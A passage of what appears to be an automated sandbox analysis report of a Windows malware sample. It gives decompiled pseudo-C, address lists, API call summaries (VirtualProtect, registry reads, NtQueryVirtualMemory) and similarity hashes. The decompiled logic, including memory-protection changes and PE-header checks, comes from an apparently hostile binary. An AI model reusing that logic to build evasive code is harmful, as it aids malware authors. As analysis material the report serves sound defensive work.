                          							_v12 = _v12 + 1;
                          							if(_v12 < _v24) {
                          								continue;
                          							} else {
                          								goto L14;
                          							}
                          						}
                          						asm("bt [esi], ecx");
                          						if((_t27 ^ 0xaefa8c5b) < 0) {
                          							goto L10;
                          						}
                          						_t28 = _t27 ^ 0xaefa8c46;
                          						goto L11;
                          					}
                          					asm("bt [esi], ecx");
                          					if((_t37 ^ 0xaefa8c5b) >= 0) {
                          						_t28 = _t27 ^ 0xaefa8c64;
                          					} else {
                          						_t28 = _t27 ^ 0xaefa8c04;
                          					}
                          					goto L11;
                          				}
                          				goto L14;
                          			}
















                          0x10001256
                          0x1000125c
                          0x10001268
                          0x10001268
                          0x10001273
                          0x10001276
                          0x10001276
                          0x1000127c
                          0x1000127f
                          0x10001281
                          0x10001287
                          0x10001323
                          0x1000132a
                          0x1000132a
                          0x1000128d
                          0x1000128d
                          0x10001290
                          0x1000129a
                          0x100012a7
                          0x100012aa
                          0x100012ac
                          0x100012cd
                          0x100012d0
                          0x100012e6
                          0x100012e6
                          0x100012eb
                          0x100012ed
                          0x100012f3
                          0x100012ff
                          0x10001303
                          0x1000130b
                          0x1000130b
                          0x1000130e
                          0x10001311
                          0x10001314
                          0x1000131d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x1000131d
                          0x100012da
                          0x100012dd
                          0x00000000
                          0x00000000
                          0x100012df
                          0x00000000
                          0x100012df
                          0x100012b4
                          0x100012b7
                          0x100012c0
                          0x100012b9
                          0x100012b9
                          0x100012b9
                          0x00000000
                          0x100012b7
                          0x00000000

                          APIs
                          • VirtualProtect.KERNELBASE(?,FF1075FF,00000004,00000000,AEFA8C44,100018FB,00000000,50FC458D,00000000), ref: 1000127F
                          • VirtualProtect.KERNELBASE(00000000,10C2C95F,?,?), ref: 100012FF
                          • GetLastError.KERNEL32 ref: 10001305
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424126405.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.2424134637.0000000010005000.00000040.00020000.sdmp Download File
                          Similarity
                          • API ID: ProtectVirtual$ErrorLast
                          • String ID:
                          • API String ID: 1469625949-0
                          • Opcode ID: d7280dc23a715a49928aa5ce2fdea0d272b8aade045e817d3241032a0fbf9d6d
                          • Instruction ID: a27679aa209cf5fdc3b1e0dc16c2a6a92c982373a6d5ac9e79d84b2c99d5ce57
                          • Opcode Fuzzy Hash: d7280dc23a715a49928aa5ce2fdea0d272b8aade045e817d3241032a0fbf9d6d
                          • Instruction Fuzzy Hash: 9F21D772911205EBEB08CF94C898AEFB7F4FB04781F114459E652E7245E770AA40CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001AA54F: CoInitializeEx.OLE32(00000000,00000002), ref: 001AA555
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,-00020019,?,?), ref: 001A170D
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 001A173A
                          • RegCloseKey.ADVAPI32(?), ref: 001A174A
                            • Part of subcall function 001A8CDD: OleUninitialize.OLE32 ref: 001A8CEB
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: CloseInitializeOpenQueryUninitializeValue
                          • String ID:
                          • API String ID: 3218621087-0
                          • Opcode ID: 2a20f40c1fafc4809591141bf1bb219a3b4125086a7627add1d03640fb7ea82a
                          • Instruction ID: 314af162a1641ec16959b48a94dc13cd415a0b363970ebd96eba846f2e1b81d5
                          • Opcode Fuzzy Hash: 2a20f40c1fafc4809591141bf1bb219a3b4125086a7627add1d03640fb7ea82a
                          • Instruction Fuzzy Hash: 9621F9BA900118AFDB11DBE4DD44EEA77FCEB4A310F1501AAF905E3552E7309A44CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SysAllocString.OLEAUT32(00000101), ref: 001A5707
                          • SysFreeString.OLEAUT32(00000000), ref: 001A5747
                          • lstrlenW.KERNEL32(?), ref: 001A5759
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: String$AllocFreelstrlen
                          • String ID:
                          • API String ID: 3808004451-0
                          • Opcode ID: f85b7a032e282f208f2cdc6d1228e7e47e90ea9a52f5792569d9b2468f528ba4
                          • Instruction ID: d35e818d89e7047906e0fac0b6deb4179503026978a534eb392d2655e0faabea
                          • Opcode Fuzzy Hash: f85b7a032e282f208f2cdc6d1228e7e47e90ea9a52f5792569d9b2468f528ba4
                          • Instruction Fuzzy Hash: 48117C3A500509BFDF019FA8DC45EAA7BB9FF49710F000526F909EB261D7719951CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 001A44EC
                          • memcpy.NTDLL(?,?,001AD12C), ref: 001A4509
                          • SafeArrayDestroy.OLEAUT32(?), ref: 001A453D
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: ArraySafe$CreateDestroymemcpy
                          • String ID:
                          • API String ID: 2364292842-0
                          • Opcode ID: d7bd9b890831978b67b4a42926753ef61321b9519b4f868016785cbefaa5bff1
                          • Instruction ID: fe2b1f3691892664fc916829796b93c8a534bf8647d2d97b97f8c60f1d920d82
                          • Opcode Fuzzy Hash: d7bd9b890831978b67b4a42926753ef61321b9519b4f868016785cbefaa5bff1
                          • Instruction Fuzzy Hash: 6C115E79A0020DBFDB119FA8DC05EEEBBB9EF55320F104065FA04E7161E7B09A559B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A3C6C: lstrlen.KERNEL32(00000000,00000101,00000202,00000000,00000000,?,001A3D78,00000001), ref: 001A3CFC
                            • Part of subcall function 001A3C6C: wsprintfA.USER32 ref: 001A3D38
                            • Part of subcall function 001A3C6C: memcpy.NTDLL(00000001,00000000,00000001,?,001A3D78,00000001), ref: 001A3D4B
                            • Part of subcall function 001A47D7: StrStrA.SHLWAPI(00000001,001AD240), ref: 001A4808
                            • Part of subcall function 001A47D7: StrChrA.SHLWAPI(0000002F,0000002F), ref: 001A4823
                            • Part of subcall function 001A47D7: memcpy.NTDLL(?,?,?,?,?,00000008,?,?,?,001A895C,00000101,?), ref: 001A483C
                            • Part of subcall function 001A47D7: memcpy.NTDLL(00000000,?,00000004,?), ref: 001A48D0
                            • Part of subcall function 001A47D7: memcpy.NTDLL(00000006,?,00000001,00000000,?,00000004,?), ref: 001A48E6
                          • wcstombs.NTDLL ref: 001AA9BF
                          • Sleep.KERNEL32(000001F4,00000000,001A8928,?,?,00000000,?,?,00000202,00000000), ref: 001AA973
                            • Part of subcall function 001AB156: lstrlen.KERNEL32(00000000,001A3D5A,?,?,?,?,?,?,?,?,?,?,?,?,001A895C,00000101), ref: 001AB15B
                            • Part of subcall function 001AB156: memset.NTDLL ref: 001AB175
                            • Part of subcall function 001AB156: HeapFree.KERNEL32(00000000,00000000), ref: 001AB186
                            • Part of subcall function 001AB156: lstrlenW.KERNEL32(00000000,001A3D5A,?,?,?,?,?,?,?,?,?,?,?,?,001A895C,00000101), ref: 001AB169
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: memcpy$lstrlen$FreeHeapSleepmemsetwcstombswsprintf
                          • String ID:
                          • API String ID: 1796966243-0
                          • Opcode ID: f812d5aa5169fba1ad29a143c21409f50af2fb6ff81e5f08b0a12aba59748fbe
                          • Instruction ID: b167794cd233ed6adbec1d0b08c32b367dea39452e39a037e64336dc7cba9e1f
                          • Opcode Fuzzy Hash: f812d5aa5169fba1ad29a143c21409f50af2fb6ff81e5f08b0a12aba59748fbe
                          • Instruction Fuzzy Hash: 44615C79900209AFCF11DFA4CC85A9EBBB8EF5A310F554065F815EB251DB34EA41CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A530F: wsprintfW.USER32 ref: 001A53C4
                            • Part of subcall function 001A530F: memcpy.NTDLL(00000000,?,?,?,00000000,00000000,?,?,?,?,00000000), ref: 001A53FD
                          • StrTrimW.SHLWAPI(?,001AD22C), ref: 001A69E0
                          • wsprintfW.USER32 ref: 001A6A2B
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: wsprintf$Trimmemcpy
                          • String ID:
                          • API String ID: 618990623-0
                          • Opcode ID: 68f6352fca5ba7e9e17eb2582249747ba2b7cd38efe4fb26c2055053c72396f4
                          • Instruction ID: ef8b9ddd3b57fc70b4df67b6d436afa3e5b390b47606b03f3b27f3057f6099a3
                          • Opcode Fuzzy Hash: 68f6352fca5ba7e9e17eb2582249747ba2b7cd38efe4fb26c2055053c72396f4
                          • Instruction Fuzzy Hash: E0315C79900209AF9B04DFA8CC84CBF7BBDFF4A350714455AF905E7251E730A94ACBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E10001F09(void* __ecx, short _a4) {
                          				char _v8;
                          				char _v12;
                          				void* __esi;
                          				void* _t16;
                          				long _t22;
                          				struct HINSTANCE__* _t31;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t31 = _a4;
                          				_t16 = E10001C44(_t31, __ecx,  &_v8,  &_a4,  &_v12);
                          				if(_t16 == 0) {
                          					_t27 = _v8 + _t31;
                          					_t7 = 0x10005004 - _v8 + _t31 + 0x22; // 0x10005026
                          					if(_t7 > _a4) {
                          						_t16 = 0x57;
                          					} else {
                          						_t16 = E10001000(_a4, _t27, _t27, _v12, _t19); // executed
                          					}
                          					if(_t16 == 0) {
                          						GetModuleFileNameW(_t31,  &_a4, 1);
                          						_t22 = GetLastError();
                          						if(_t22 != 0 && _t22 != 0x7a) {
                          							E10001548();
                          						}
                          						_t16 = E100018E0(_t31, _t31,  *0x10004090,  *0x10004018,  *0x1000401c); // executed
                          					}
                          				}
                          				asm("lock xadd [ecx], edx");
                          				return _t16;
                          			}









                          0x10001f0c
                          0x10001f0d
                          0x10001f0f
                          0x10001f20
                          0x10001f27
                          0x10001f2c
                          0x10001f36
                          0x10001f3c
                          0x10001f4f
                          0x10001f3e
                          0x10001f46
                          0x10001f46
                          0x10001f52
                          0x10001f5b
                          0x10001f61
                          0x10001f69
                          0x10001f70
                          0x10001f70
                          0x10001f88
                          0x10001f88
                          0x10001f52
                          0x10001f95
                          0x10001f9b

                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 10001F5B
                          • GetLastError.KERNEL32(?,?,10005004,?,?,?), ref: 10001F61
                            • Part of subcall function 10001000: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,?,?,10001F4B,?,?,10005004,?,?), ref: 1000103A
                            • Part of subcall function 10001000: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?), ref: 10001055
                            • Part of subcall function 10001000: CloseHandle.KERNELBASE(00000000), ref: 10001070
                            • Part of subcall function 10001000: memcpy.NTDLL(00000000,?,?), ref: 10001099
                          Memory Dump Source
                          • Source File: 00000004.00000002.2424126405.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.2424134637.0000000010005000.00000040.00020000.sdmp Download File
                          Similarity
                          • API ID: memcpy$CloseCreateErrorEventFileHandleLastModuleName
                          • String ID:
                          • API String ID: 1971676305-0
                          • Opcode ID: 9776a2a99bf41ac42b5084e97a221c37a4dd064875a615d604e29c3b98b8e8e9
                          • Instruction ID: 0c2a1fd85ef229f6e0ef9c95d7e8630fecf8776dc6bde0f90f5dfdab0473fac9
                          • Opcode Fuzzy Hash: 9776a2a99bf41ac42b5084e97a221c37a4dd064875a615d604e29c3b98b8e8e9
                          • Instruction Fuzzy Hash: A8115B7620411ABBFB05DBA4CC80EEE3BACEF043D4B114125FA05D60A8DB70EA459BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 001A61E1
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID:
                          • API String ID: 2244384528-0
                          • Opcode ID: 0e0a16d1c595dbd0c931604225779074316b04f02643ddd60ed5bc9bbe19c405
                          • Instruction ID: eea1817171d126740be2299cedefcfda5afc497078d6ca93984513db19fc9083
                          • Opcode Fuzzy Hash: 0e0a16d1c595dbd0c931604225779074316b04f02643ddd60ed5bc9bbe19c405
                          • Instruction Fuzzy Hash: 0031FDB6A10108AFDB04DBE4DC45FAA77FCEB19304F1801A6F906D7651D731EA45CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001A4B70
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Time$FileSystem
                          • String ID:
                          • API String ID: 2086374402-0
                          • Opcode ID: 230c7f104992b66fefa7c46c2eaef29ff89822f14f5609128ae693170171bfe0
                          • Instruction ID: 2e9a144f961c4f30c42b407b3a506a942d016a8d2a305ac9ea00d792220a88df
                          • Opcode Fuzzy Hash: 230c7f104992b66fefa7c46c2eaef29ff89822f14f5609128ae693170171bfe0
                          • Instruction Fuzzy Hash: 40111FB6110005AFD704DBD4DC85FE637ECAB16304B2901AAF519C7863E730A68ECB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CoInitializeEx.OLE32(00000000,00000002), ref: 001AA555
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Initialize
                          • String ID:
                          • API String ID: 2538663250-0
                          • Opcode ID: 393004e0905425ea5ae5e1257d334d08fdf92afe9449526bc0dd26f92845c073
                          • Instruction ID: bae8f68a1b10f76682029c21d1bfb0063379057a6ef007191461a319b2e48527
                          • Opcode Fuzzy Hash: 393004e0905425ea5ae5e1257d334d08fdf92afe9449526bc0dd26f92845c073
                          • Instruction Fuzzy Hash: 77D0A7B1E8553013C631A654AC4895BAD94DF0BB60F664916E445C6520C364CCC1C6C6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Uninitialize
                          • String ID:
                          • API String ID: 3861434553-0
                          • Opcode ID: 529778f65c31f7fc9372b5f66540b09035e5624fda00fb06b04b67281696e22d
                          • Instruction ID: bdf6ee7e351c7b20659427971b59caafd85d5298f9742d78e9b36ec3110cbeab
                          • Opcode Fuzzy Hash: 529778f65c31f7fc9372b5f66540b09035e5624fda00fb06b04b67281696e22d
                          • Instruction Fuzzy Hash: 03B092B4407300DADB258B00920C3AAB3A0ABA272AF00C42BE585024998B308C84EE6A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • Sleep.KERNELBASE(000001F4), ref: 001AB224
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 9c9234b74312d1644885acacb9aab8dc6f2dd91266064cf02956ae9623df8fd2
                          • Instruction ID: d19f216f4674963490309737f5ec094e2ff0bfcf623f719100f56083b170e4ce
                          • Opcode Fuzzy Hash: 9c9234b74312d1644885acacb9aab8dc6f2dd91266064cf02956ae9623df8fd2
                          • Instruction Fuzzy Hash: 35F0A075905258EFDB15CB88D88CBEEB3BCEB06304F1440ABE101A3102D3B46E80CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          APIs
                            • Part of subcall function 001A62C3: RtlInitUnicodeString.NTDLL(00000000,00000000), ref: 001A62D1
                          • RtlInitUnicodeString.NTDLL(00000001,00000000), ref: 001AAC89
                          • NtClose.NTDLL(00000000), ref: 001AACB6
                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 001AACBD
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: InitStringUnicode$CloseErrorStatus
                          • String ID:
                          • API String ID: 3730339290-0
                          • Opcode ID: d1a879ca7c65f8dd6e4feb9b8050cec14e67bec2c33ce00277ffd1b83a84ec1b
                          • Instruction ID: 6917de9337172dcf0955adbc7f9e83f9b6f5d2b74de0bfec7908714e4536eb31
                          • Opcode Fuzzy Hash: d1a879ca7c65f8dd6e4feb9b8050cec14e67bec2c33ce00277ffd1b83a84ec1b
                          • Instruction Fuzzy Hash: D7014B36800618FFDB11ABA0DD09F9E7BB9EF06311F048450FA02E6560DB71AA04EB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 001A1462: RtlNtStatusToDosError.NTDLL(00000000), ref: 001A147B
                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 001A6182
                          • NtClose.NTDLL(?), ref: 001A6191
                            • Part of subcall function 001A5D55: lstrlenW.KERNEL32(00000000,00000000,?,001A6172,?,?,00000000,00000000,00000000,?), ref: 001A5D5C
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: ErrorStatus$Closelstrlen
                          • String ID:
                          • API String ID: 3927582856-0
                          • Opcode ID: a315c4faaf1cea49d9cbcc463ba12a877ff0d5a8dec319866d07ac2d001408e5
                          • Instruction ID: e75ddfb4cc28f735b59ef7b80522692d1b901fc7d4d4d98315e9cd2b21ac2ea3
                          • Opcode Fuzzy Hash: a315c4faaf1cea49d9cbcc463ba12a877ff0d5a8dec319866d07ac2d001408e5
                          • Instruction Fuzzy Hash: 8E11AC7A900118BBDB22ABA4CC08EEEBABCEB52340F044161BD19E6061D730DE419B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004), ref: 001A3420
                          • GetSystemDefaultUILanguage.KERNEL32 ref: 001A342A
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: DefaultInfoLanguageLocaleSystem
                          • String ID:
                          • API String ID: 2752405320-0
                          • Opcode ID: e5ace41246ad7fda12ee5cb30abf94104190f5a9f7b6fce3b550b59b5b0d9917
                          • Instruction ID: 9855f3f649c0792ce49291816323905a98806950ae96fd7b7a567a742ad83dcc
                          • Opcode Fuzzy Hash: e5ace41246ad7fda12ee5cb30abf94104190f5a9f7b6fce3b550b59b5b0d9917
                          • Instruction Fuzzy Hash: 5DE04FB8640208F6E700E7A1AD0BBBE72ACAB01B0AF500184FB11E64C0D7B49E05A769
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.2420035916.00000000001A1000.00000020.00000001.sdmp, Offset: 001A1000, based on PE: false
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: a38e43bb390d82f12b17a0986c566590db3cc8d3b1c8e00a07617421572c6179
                          • Instruction ID: b743e58c38be8a382eee83e071e473b267e83da19b25ca2c6952d70e87d91bca
                          • Opcode Fuzzy Hash: a38e43bb390d82f12b17a0986c566590db3cc8d3b1c8e00a07617421572c6179
                          • Instruction Fuzzy Hash: 3B22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E10002415(long _a4) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				signed int _v16;
                          				short* _v32;
                          				void _v36;
                          				void* _t57;
                          				signed int _t58;
                          				signed int _t61;
                          				signed int _t62;
                          				void* _t63;
                          				signed int* _t68;
                          				intOrPtr* _t69;
                          				intOrPtr* _t71;
                          				intOrPtr _t72;
                          				intOrPtr _t75;
                          				void* _t76;
                          				signed int _t77;
                          				void* _t78;
                          				void _t80;
                          				signed int _t81;
                          				signed int _t84;
                          				signed int _t86;
                          				short* _t87;
                          				void* _t89;
                          				signed int* _t90;
                          				long _t91;
                          				signed int _t93;
                          				signed int _t94;
                          				signed int _t100;
                          				signed int _t102;
                          				void* _t104;
                          				long _t108;
                          				signed int _t110;
                          
                          				_t108 = _a4;
                          				_t76 =  *(_t108 + 8);
                          				if((_t76 & 0x00000003) != 0) {
                          					L3:
                          					return 0;
                          				}
                          				_a4 =  *[fs:0x4];
                          				_v8 =  *[fs:0x8];
                          				if(_t76 < _v8 || _t76 >= _a4) {
                          					_t102 =  *(_t108 + 0xc);
                          					__eflags = _t102 - 0xffffffff;
                          					if(_t102 != 0xffffffff) {
                          						_t91 = 0;
                          						__eflags = 0;
                          						_a4 = 0;
                          						_t57 = _t76;
                          						do {
                          							_t80 =  *_t57;
                          							__eflags = _t80 - 0xffffffff;
                          							if(_t80 == 0xffffffff) {
                          								goto L9;
                          							}
                          							__eflags = _t80 - _t91;
                          							if(_t80 >= _t91) {
                          								L20:
                          								_t63 = 0;
                          								L60:
                          								return _t63;
                          							}
                          							L9:
                          							__eflags =  *(_t57 + 4);
                          							if( *(_t57 + 4) != 0) {
                          								_t12 =  &_a4;
                          								 *_t12 = _a4 + 1;
                          								__eflags =  *_t12;
                          							}
                          							_t91 = _t91 + 1;
                          							_t57 = _t57 + 0xc;
                          							__eflags = _t91 - _t102;
                          						} while (_t91 <= _t102);
                          						__eflags = _a4;
                          						if(_a4 == 0) {
                          							L15:
                          							_t81 =  *0x10004040;
                          							_t110 = _t76 & 0xfffff000;
                          							_t58 = 0;
                          							__eflags = _t81;
                          							if(_t81 <= 0) {
                          								L18:
                          								_t104 = _t102 | 0xffffffff;
                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                          								__eflags = _t61;
                          								if(_t61 < 0) {
                          									_t62 = 0;
                          									__eflags = 0;
                          								} else {
                          									_t62 = _a4;
                          								}
                          								__eflags = _t62;
                          								if(_t62 == 0) {
                          									L59:
                          									_t63 = _t104;
                          									goto L60;
                          								} else {
                          									__eflags = _v12 - 0x1000000;
                          									if(_v12 != 0x1000000) {
                          										goto L59;
                          									}
                          									__eflags = _v16 & 0x000000cc;
                          									if((_v16 & 0x000000cc) == 0) {
                          										L46:
                          										_t63 = 1;
                          										 *0x10004088 = 1;
                          										__eflags =  *0x10004088;
                          										if( *0x10004088 != 0) {
                          											goto L60;
                          										}
                          										_t84 =  *0x10004040;
                          										__eflags = _t84;
                          										_t93 = _t84;
                          										if(_t84 <= 0) {
                          											L51:
                          											__eflags = _t93;
                          											if(_t93 != 0) {
                          												L58:
                          												 *0x10004088 = 0;
                          												goto L5;
                          											}
                          											_t77 = 0xf;
                          											__eflags = _t84 - _t77;
                          											if(_t84 <= _t77) {
                          												_t77 = _t84;
                          											}
                          											_t94 = 0;
                          											__eflags = _t77;
                          											if(_t77 < 0) {
                          												L56:
                          												__eflags = _t84 - 0x10;
                          												if(_t84 < 0x10) {
                          													_t86 = _t84 + 1;
                          													__eflags = _t86;
                          													 *0x10004040 = _t86;
                          												}
                          												goto L58;
                          											} else {
                          												do {
                          													_t68 = 0x10004048 + _t94 * 4;
                          													_t94 = _t94 + 1;
                          													__eflags = _t94 - _t77;
                          													 *_t68 = _t110;
                          													_t110 =  *_t68;
                          												} while (_t94 <= _t77);
                          												goto L56;
                          											}
                          										}
                          										_t69 = 0x10004044 + _t84 * 4;
                          										while(1) {
                          											__eflags =  *_t69 - _t110;
                          											if( *_t69 == _t110) {
                          												goto L51;
                          											}
                          											_t93 = _t93 - 1;
                          											_t69 = _t69 - 4;
                          											__eflags = _t93;
                          											if(_t93 > 0) {
                          												continue;
                          											}
                          											goto L51;
                          										}
                          										goto L51;
                          									}
                          									_t87 = _v32;
                          									__eflags =  *_t87 - 0x5a4d;
                          									if( *_t87 != 0x5a4d) {
                          										goto L59;
                          									}
                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                          									__eflags =  *_t71 - 0x4550;
                          									if( *_t71 != 0x4550) {
                          										goto L59;
                          									}
                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                          										goto L59;
                          									}
                          									_t78 = _t76 - _t87;
                          									__eflags =  *((short*)(_t71 + 6));
                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                          									if( *((short*)(_t71 + 6)) <= 0) {
                          										goto L59;
                          									}
                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                          									__eflags = _t78 - _t72;
                          									if(_t78 < _t72) {
                          										goto L46;
                          									}
                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                          										goto L46;
                          									}
                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                          										goto L20;
                          									}
                          									goto L46;
                          								}
                          							} else {
                          								goto L16;
                          							}
                          							while(1) {
                          								L16:
                          								__eflags =  *((intOrPtr*)(0x10004048 + _t58 * 4)) - _t110;
                          								if( *((intOrPtr*)(0x10004048 + _t58 * 4)) == _t110) {
                          									break;
                          								}
                          								_t58 = _t58 + 1;
                          								__eflags = _t58 - _t81;
                          								if(_t58 < _t81) {
                          									continue;
                          								}
                          								goto L18;
                          							}
                          							__eflags = _t58;
                          							if(_t58 <= 0) {
                          								goto L5;
                          							}
                          							 *0x10004088 = 1;
                          							__eflags =  *0x10004088;
                          							if( *0x10004088 != 0) {
                          								goto L5;
                          							}
                          							__eflags =  *((intOrPtr*)(0x10004048 + _t58 * 4)) - _t110;
                          							if( *((intOrPtr*)(0x10004048 + _t58 * 4)) == _t110) {
                          								L32:
                          								_t100 = 0;
                          								__eflags = _t58;
                          								if(_t58 < 0) {
                          									L34:
                          									 *0x10004088 = 0;
                          									goto L5;
                          								} else {
                          									goto L33;
                          								}
                          								do {
                          									L33:
                          									_t90 = 0x10004048 + _t100 * 4;
                          									_t100 = _t100 + 1;
                          									__eflags = _t100 - _t58;
                          									 *_t90 = _t110;
                          									_t110 =  *_t90;
                          								} while (_t100 <= _t58);
                          								goto L34;
                          							}
                          							_t58 = _t81 - 1;
                          							__eflags = _t58;
                          							if(_t58 < 0) {
                          								L28:
                          								__eflags = _t81 - 0x10;
                          								if(_t81 < 0x10) {
                          									_t81 = _t81 + 1;
                          									__eflags = _t81;
                          									 *0x10004040 = _t81;
                          								}
                          								_t58 = _t81 - 1;
                          								goto L32;
                          							} else {
                          								goto L25;
                          							}
                          							while(1) {
                          								L25:
                          								__eflags =  *((intOrPtr*)(0x10004048 + _t58 * 4)) - _t110;
                          								if( *((intOrPtr*)(0x10004048 + _t58 * 4)) == _t110) {
                          									break;
                          								}
                          								_t58 = _t58 - 1;
                          								__eflags = _t58;
                          								if(_t58 >= 0) {
                          									continue;
                          								}
                          								break;
                          							}
                          							__eflags = _t58;
                          							if(__eflags >= 0) {
                          								if(__eflags == 0) {
                          									goto L34;
                          								}
                          								goto L32;
                          							}
                          							goto L28;
                          						}
                          						_t75 =  *((intOrPtr*)(_t108 - 8));
                          						__eflags = _t75 - _v8;
                          						if(_t75 < _v8) {
                          							goto L20;
                          						}
                          						__eflags = _t75 - _t108;
                          						if(_t75 >= _t108) {
                          							goto L20;
                          						}
                          						goto L15;
                          					}
                          					L5:
                          					_t63 = 1;
                          					goto L60;
                          				} else {
                          					goto L3;
                          				}
                          			}




































                          0x1000241f
                          0x10002422
                          0x10002428
                          0x10002446
                          0x00000000
                          0x10002446
                          0x10002430
                          0x10002439
                          0x1000243f
                          0x1000244e
                          0x10002451
                          0x10002454
                          0x1000245e
                          0x1000245e
                          0x10002460
                          0x10002463
                          0x10002465
                          0x10002465
                          0x10002467
                          0x1000246a
                          0x00000000
                          0x00000000
                          0x1000246c
                          0x1000246e
                          0x100024d4
                          0x100024d4
                          0x10002632
                          0x00000000
                          0x10002632
                          0x10002470
                          0x10002470
                          0x10002474
                          0x10002476
                          0x10002476
                          0x10002476
                          0x10002476
                          0x10002479
                          0x1000247a
                          0x1000247d
                          0x1000247d
                          0x10002481
                          0x10002485
                          0x10002493
                          0x10002493
                          0x1000249b
                          0x100024a1
                          0x100024a3
                          0x100024a5
                          0x100024b5
                          0x100024c2
                          0x100024c6
                          0x100024cb
                          0x100024cd
                          0x1000254b
                          0x1000254b
                          0x100024cf
                          0x100024cf
                          0x100024cf
                          0x1000254d
                          0x1000254f
                          0x10002630
                          0x10002630
                          0x00000000
                          0x10002555
                          0x10002555
                          0x1000255c
                          0x00000000
                          0x00000000
                          0x10002562
                          0x10002566
                          0x100025c2
                          0x100025c4
                          0x100025cc
                          0x100025ce
                          0x100025d0
                          0x00000000
                          0x00000000
                          0x100025d2
                          0x100025d8
                          0x100025da
                          0x100025dc
                          0x100025f1
                          0x100025f1
                          0x100025f3
                          0x10002622
